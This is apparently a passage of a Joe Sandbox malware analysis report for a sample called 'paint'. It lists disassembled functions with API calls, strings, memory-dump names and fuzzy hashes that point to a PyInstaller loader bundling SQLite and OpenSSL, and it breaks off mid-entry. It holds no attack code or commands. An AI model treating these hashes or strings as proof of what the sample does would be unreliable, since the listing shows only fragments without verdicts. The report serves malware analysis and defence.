Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
Instruction Fuzzy Hash: 4F817B20F0876346FB6C9B659461A7A3A94AF45780F9CC0B5DA6C472DEDE2CE94F8700

Function 00007FF6F0BE6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE6343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE6730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE69CC

Strings

:, xrefs: 00007FF6F0BE64FC
-, xrefs: 00007FF6F0BE63D9
p, xrefs: 00007FF6F0BE63F5
p, xrefs: 00007FF6F0BE646D
f, xrefs: 00007FF6F0BE6465

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 6f3795f9fda3e88f4eea34e79635956c3c1b7d4a4efaf9c6df4ed329367011db
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 4212C276E0C143A6FB249A14E1542B976A1FB527D4FC44175E6AB87BC4FF3EE9808B00

Function 00007FF6F0BE1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE1078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE1440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE16DF

Strings

p, xrefs: 00007FF6F0BE1182
f, xrefs: 00007FF6F0BE12C5
f, xrefs: 00007FF6F0BE1110
p, xrefs: 00007FF6F0BE111D
f, xrefs: 00007FF6F0BE117A

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 205dc92ebd49949720dff3d89ade4fbf1a4ee3d0763243f892527f65f18e6c97
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 1812B772E0C143A6FB209A15E0546797261FB82754FE84875D6ABC77C4EF7EE880CB14

Function 00007FFDFB0C2100 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0C219A

Strings

%s %T already exists, xrefs: 00007FFDFB0C233D
view, xrefs: 00007FFDFB0C222E, 00007FFDFB0C2344
temporary table name must be unqualified, xrefs: 00007FFDFB0C21CE
table, xrefs: 00007FFDFB0C2235
there is already an index named %s, xrefs: 00007FFDFB0C23AE
sqlite_master, xrefs: 00007FFDFB0C211F, 00007FFDFB0C2282, 00007FFDFB0C25D4
sqlite_temp_master, xrefs: 00007FFDFB0C2159, 00007FFDFB0C225D

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 4225454184-2846519077
Opcode ID: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
Instruction ID: c31ad146f33e859fd83ded27da3d9cd6b1feb9295d4d40e616bef7aa0c108fdb
Opcode Fuzzy Hash: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
Instruction Fuzzy Hash: 6D02A2A2B0A78386E714EF159420BB93791FB46B88F404235DE6D47BE9DF3CE5519700

Function 00007FFDFB070A40 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

Download Yara Rule

APIs

new[].MSPDB140-MSVCRT ref: 00007FFDFB070B57

Strings

%s%c%s, xrefs: 00007FFDFB070AB6
\, xrefs: 00007FFDFB070AC8
:, xrefs: 00007FFDFB070A71
winFullPathname1, xrefs: 00007FFDFB070B3C
winFullPathname2, xrefs: 00007FFDFB070BC5
?, xrefs: 00007FFDFB070A81
:, xrefs: 00007FFDFB070AAC

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: new[]
String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
API String ID: 4059295235-3840279414
Opcode ID: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
Instruction ID: dcb732ced66b309ad985e4c773f254859466383051521f4be7f02f550ca507a5
Opcode Fuzzy Hash: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
Instruction Fuzzy Hash: 25514C12F0E38345F7159B61A431EBAA692EF46B88F484132DD6D433EEDE3CE5459344

Function 00007FF6F0BD1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6F0BD1098
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6F0BD10CC
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6F0BD11F6
fseek, xrefs: 00007FF6F0BD10D3
fread, xrefs: 00007FF6F0BD11FD
malloc, xrefs: 00007FF6F0BD110F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6F0BD1108

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 9b0fbd36dafbdab35367861db69707bdc9953610152ace5b45e374509e78701a
Instruction ID: f3053970c7765fdc275e4e6a1a0df4409fb8cdfbd2eb3e872ea777182c681ac3
Opcode Fuzzy Hash: 9b0fbd36dafbdab35367861db69707bdc9953610152ace5b45e374509e78701a
Instruction Fuzzy Hash: CE419425A09653B2EB10DB52A8006B9A396FF46BC4FC44831EE2E877C5EF3EE5458740

Function 00007FF6F0BD8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD88F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD88FA
CreateDirectoryW.KERNEL32(?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD893C

Part of subcall function 00007FF6F0BD8A20: GetEnvironmentVariableW.KERNEL32(00007FF6F0BD388E), ref: 00007FF6F0BD8A57
Part of subcall function 00007FF6F0BD8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6F0BD8A79

Part of subcall function 00007FF6F0BE82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE82C1

Part of subcall function 00007FF6F0BD2810: MessageBoxW.USER32 ref: 00007FF6F0BD28EA

Strings

TMP, xrefs: 00007FF6F0BD88B2
_MEI%d, xrefs: 00007FF6F0BD8902
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6F0BD896E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6F0BD88CC
TMP, xrefs: 00007FF6F0BD888C, 00007FF6F0BD8993

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction ID: e0653768494b0e64a5ac929e36bcf9a97ad7fbaa9d53d81d11b97cf1b5545436
Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction Fuzzy Hash: 5541A311A1A64370FB20AB61A8652B95392AF87BC5FC01131ED2FC77D6FE3EE5059340

Function 00007FFDFB072CF0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 339COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0730AA

Strings

API called with NULL prepared statement, xrefs: 00007FFDFB072E54
ATTACH x AS %Q, xrefs: 00007FFDFB072D80
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB072D63, 00007FFDFB072EF9
API called with finalized prepared statement, xrefs: 00007FFDFB072E6C, 00007FFDFB072EE8
%s at line %d of [%.10s], xrefs: 00007FFDFB072EA5, 00007FFDFB072F12
misuse, xrefs: 00007FFDFB072E99, 00007FFDFB072F06

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
API String ID: 4225454184-1404302391
Opcode ID: a6dc8db243f1a1c96d35a00d03fc856939b0bdf9cf4add3f83b6bcb6089b802e
Instruction ID: c3a01b2d339d98cb4f65322bce1a4efed0a8ce8722b6658bcf64d7aaa729af94
Opcode Fuzzy Hash: a6dc8db243f1a1c96d35a00d03fc856939b0bdf9cf4add3f83b6bcb6089b802e
Instruction Fuzzy Hash: 25F15C62B0AA4385FB649F11A464BB9B394FF46B84F244135C96E077F9CF3CE446A341

Function 00007FF6F0BDEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6F0BDEAD5

Part of subcall function 00007FF6F0BDFA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF6F0BDFA6F
Part of subcall function 00007FF6F0BDFA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6F0BDFA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6F0BDEBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6F0BDEDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6F0BDEF08

Strings

csm, xrefs: 00007FF6F0BDEB56
csm, xrefs: 00007FF6F0BDEBD0
csm, xrefs: 00007FF6F0BDEAEF

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: af8c24269209165b98cb0864f414d9f6bf6914952fe75db10fabfb79404f2578
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 82D18332A0974196EB60AF25D4403ADB7A2FB56788F500136EEAE977D5EF39E140C700

Function 00007FF6F0BEED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6F0BEF11A,?,?,000002076F5096E8,00007FF6F0BEADC3,?,?,?,00007FF6F0BEACBA,?,?,?,00007FF6F0BE5FAE), ref: 00007FF6F0BEEEFC
GetProcAddress.KERNEL32(?,?,?,00007FF6F0BEF11A,?,?,000002076F5096E8,00007FF6F0BEADC3,?,?,?,00007FF6F0BEACBA,?,?,?,00007FF6F0BE5FAE), ref: 00007FF6F0BEEF08

Strings

ext-ms-, xrefs: 00007FF6F0BEEE59
api-ms-, xrefs: 00007FF6F0BEEE46

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: 6a1bdb23e936fd7f42fef10fe50e52eb6c64d494d97c892e80570c4d225324bd
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: F341DC61B19A02A1FB56CB16980467523A6BF4AB90FC84539ED3FC77C4FE7EE805C204

Function 00007FF6F0BD2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
MessageBoxW.USER32 ref: 00007FF6F0BD2D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF6F0BD2D70
[PYI-%d:ERROR] , xrefs: 00007FF6F0BD2CA6
Error, xrefs: 00007FF6F0BD2D8C
%ls: , xrefs: 00007FF6F0BD2D22

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 74a1d41eeb86fb3bacc1a54d940c81f37d22737b76f742503b2c4ee3a7605bbe
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: 6A31E736B08B4162E7209B61A8146ABA696BF85788F810135EF5ED3799FF3DD546C300

Function 00007FFE007626E4 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

SERVERINFOV2 FOR , xrefs: 00007FFE0078A650
..\s\ssl\ssl_rsa.c, xrefs: 00007FFE0078A52D, 00007FFE0078A56E, 00007FFE0078A62D, 00007FFE0078A69B, 00007FFE0078A6F6, 00007FFE0078A70F, 00007FFE0078A729, 00007FFE0078A7A8, 00007FFE0078A7DE, 00007FFE0078A802, 00007FFE0078A832, 00007FFE0078A856, 00007FFE0078A878, 00007FFE0078A88E, 00007FFE0078A8A4, 00007FFE0078A8BA
SSL_CTX_use_serverinfo_file, xrefs: 00007FFE0078A521, 00007FFE0078A562, 00007FFE0078A626, 00007FFE0078A79C, 00007FFE0078A7D2, 00007FFE0078A7FB, 00007FFE0078A826, 00007FFE0078A84A
SERVERINFO FOR , xrefs: 00007FFE0078A5E6

Memory Dump Source

Source File: 00000001.00000002.2016607190.00007FFE00761000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00760000, based on PE: true

Associated: 00000001.00000002.2016576633.00007FFE00760000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE007E3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE0080D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE00818000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE00823000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016859124.00007FFE00827000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00760000_paint.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
API String ID: 0-2528746747
Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
Instruction ID: d5438c1ab7d8a43197d8d6ec84fe4488ca1a986aee0f0b9701666be9f4b463cc
Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
Instruction Fuzzy Hash: 32B17E61A0A64295FB21FB52D8402BD2765BF847C4F484033EB8D17BBEDE3CEA458352

Function 00007FF6F0BDDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDBD
GetLastError.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDF5
FreeLibrary.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDE63
GetProcAddress.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDE6F

Strings

api-ms-, xrefs: 00007FF6F0BDDDDD

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: cd9b4745b9f245c73ef0761b963d4302fbcde324ea49b6a6bd431ce616866e7a
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 6F31B421B1B602A2EF219B52A800675A399FF5ABA0FC94535DD7E8B3C0FF3DE4448304

Function 00007FF6F0BD2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6F0BD351A,?,00000000,00007FF6F0BD3F23), ref: 00007FF6F0BD2AA0

Strings

Warning [ANSI Fallback], xrefs: 00007FF6F0BD2B0F
Warning, xrefs: 00007FF6F0BD2B1E
0, xrefs: 00007FF6F0BD2B16
[PYI-%d:%s] , xrefs: 00007FF6F0BD2AA8
WARNING, xrefs: 00007FF6F0BD2AAF

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: c45071b39fe7a203cf4105d7ff0325b1c81044151180f5b5fbfefcafb3be323a
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 91218372619782A2E7209B51B4417E6A3A4FB897C4F800131EE9E93799EF3DD1458740

Function 00007FF6F0BD8760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6F0BD8780
OpenProcessToken.ADVAPI32 ref: 00007FF6F0BD8793
GetTokenInformation.ADVAPI32 ref: 00007FF6F0BD87B8
GetLastError.KERNEL32 ref: 00007FF6F0BD87C2
GetTokenInformation.ADVAPI32 ref: 00007FF6F0BD8802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6F0BD881E
CloseHandle.KERNEL32 ref: 00007FF6F0BD8836

Memory Dump Source

